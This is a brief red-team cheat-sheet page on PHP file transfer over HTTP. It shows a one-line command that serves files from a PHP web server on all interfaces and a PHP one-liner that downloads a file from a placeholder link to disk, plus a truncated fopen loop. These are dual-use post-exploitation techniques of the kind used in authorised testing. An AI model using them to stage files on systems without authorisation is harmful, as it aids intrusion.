Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / FILE TRANSFERS / HTTP

php

Servers:


php -S 0.0.0.0:8000

Downloads:


file_get_contents():
php -r '$file=file_get_contents("https://LINK");file_put_contents("OUT",$file);'

fopen loop:
php -r 'const BUFFER=1024; ...'